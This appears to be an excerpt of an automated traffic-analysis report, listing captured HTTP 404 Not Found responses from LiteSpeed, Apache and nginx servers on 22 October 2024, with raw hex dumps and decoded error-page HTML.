                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 22 Oct 2024 07:05:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Tue, 22 Oct 2024 07:05:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:05:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:05:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:05:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:05:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 07:05:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 07:05:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 07:05:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 07:06:02 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:09 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:11 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 